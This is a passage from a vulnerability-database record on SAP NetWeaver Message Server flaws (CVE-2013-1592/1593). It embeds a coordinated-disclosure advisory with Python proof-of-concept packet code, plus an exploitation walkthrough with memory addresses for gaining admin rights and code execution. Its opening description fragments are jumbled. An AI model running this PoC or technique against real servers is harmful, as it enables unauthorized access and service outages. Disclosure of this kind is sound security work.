exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. \n\nThe vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize_connection(hostname, port):\n\n # Connect\n print \"[*] Connecting to\", hostname, \"port\", port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((hostname, port))\n\n # Send initialization packet\n print \"[*] Conected, sending login request\"\n\n init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n init+= \u0027\\x04\u0027 # version\n init+= \u0027\\x00\u0027 # errorno\n init+= client_string # toname\n init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n init+= client_string # fromname\n init+= \u0027\\x00\\x00\u0027 # padd\n send_packet(connection, init)\n\n # Receive response\n print \"[*] Receiving login reply\"\n (length, data) = receive(connection)\n\n # Parsing login reply\n server_name = data[4+64:4+64+40]\n\n return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid dd ?\n00000008 serviceid dd ?\n0000000C groupid dd ?\n00000010 nodetype db ?\n00000011 db ? ; undefined\n00000012 db ? ; undefined\n00000013 db ? ; undefined\n00000014 totallength dd ?\n00000018 currentlength dd ?\n0000001C currentoffset dd ?\n00000020 totalblocks db ?\n00000021 currentblock db ?\n00000021\n00000022 db ? ; undefined\n00000023 db ? ; undefined\n00000024 messagetype dd ?\n00000028 MSJ2EE_HEADER ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov edi, [ebp+pJ2eeHeader]\nmov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor ecx, ecx\ncmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea esi, [eax+eax*8]\nlea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000 ; XREF:\n.data:j2ee_stat_totalr\n00000000 ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount dq ? ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000 ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008 ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010 ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018 ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020 ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028 ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply dq ? ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030 ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038 ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040 ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359 movzx eax, [ebp+msiflag]\n.text:0044D35D sub eax, 0Ch\n.text:0044D360 jz short loc_44D37C\n.text:0044D362 sub eax, ebx\n.text:0044D364 jnz short loc_44D39D\n.text:0044D366 cmp [ebp+msflag], 2\n.text:0044D36A jnz short loc_44D374\n.text:0044D36C add [esi+40h], ebx ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F adc [esi+44h], ecx\n.text:0044D372 jmp short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374: ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374 add [esi+38h], ebx ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377 adc [esi+3Ch], ecx\n.text:0044D37A jmp short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C: ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C mov al, [ebp+msflag]\n.text:0044D37F cmp al, 3\n.text:0044D381 jnz short loc_44D38B\n.text:0044D383 add [esi+30h], ebx ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386 adc [esi+34h], ecx\n.text:0044D389 jmp short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B: ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B cmp al, 2\n.text:0044D38D jnz short loc_44D397\n.text:0044D38F add [esi+28h], ebx ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392 adc [esi+2Ch], ecx\n.text:0044D395 jmp short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397: ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397 add [esi+20h], ebx ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A adc [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7 add [esi],\nebx ;add 1 to [esi]\n.text:0044D3B9 adc dword ptr [esi+4], 0\n.text:0044D3BD mov eax,\n[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0 cdq\n.text:0044D3C1 add [esi+8],\neax ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s struc ; (sizeof=0x538, standard type)\n00000000 ; XREF: .data:dummy_clientr\n00000000 client_type dd ? ; enum MS_CLIENT_TYPE\n00000004 stat dd ? ; enum MS_STAT\n00000008 connection_ID dd ?\n0000000C status db ?\n0000000D dom db ? ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed db ?\n0000000F db ? ; undefined\n00000010 name dw 40 dup(?)\n[...]\n00000534 _padding db 4 dup(?)\n00000538 MSADM_s ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC: ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n ; MsSLoginClient+B26j\n.text:004230DC cmp byte ptr [edi+0Eh],\n0 ; privileged client?\n.text:004230E0 jnz short\nloc_4230EA ; if yes, jump\n.text:004230E2 mov al, byte ptr\nms_admin_allowed ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7 mov [edi+0Eh],\nal ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0 ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n 1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n 2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0 offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ;\u003c-- we can overwrite this one\n.data:0087DED0 offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3: ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3 lea esi, [edi+edi*2]\n.text:00404DB6 mov edi, [ebp+pvalue]\n.text:00404DB9 add esi, esi\n.text:00404DBB mov edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2 add esi, esi\n.text:00404DC4 push edi\n.text:00404DC5 push pname\n.text:00404DC6 call edx ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n 1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n 2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \nAfter sending the second \u0027MS_SET_PROPERTY\u0027 packet, the SAP Netweaver\nMessage Server will start listening on the specified port, waiting for\nconnections from instances of the msmon.exe monitoring program [4]. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n crash+= \"\\x00\\x00\\x00\\x01\"\n crash+= \"\\xff\\xff\\xff\\xff\"\n crash+= \"\\x00\\x00\\x00\\x00\"\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+= \"AD-EYECATCH\\x00\"\n crash+= \"\\x01\\x01\"\n crash+= \"%11d\" % 104\n crash+= \"%11d\" % 1\n crash+= \"\\x15\\x00\\x00\\x00\"\n crash+= \"\\x20\\x00\\x00\\xc8\"\n crash+= \"LALA\" + \u0027 \u0027*(20-4)\n crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n crash+= \" \"*36\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "PACKETSTORM",
"id": "120350"
},
{
"db": "PACKETSTORM",
"id": "114279"
}
],
"trust": 5.49
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=24511",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-1592"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1592",
"trust": 2.9
},
{
"db": "BID",
"id": "57956",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1028148",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "24511",
"trust": 1.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 0.8
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54229",
"trust": 0.6
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
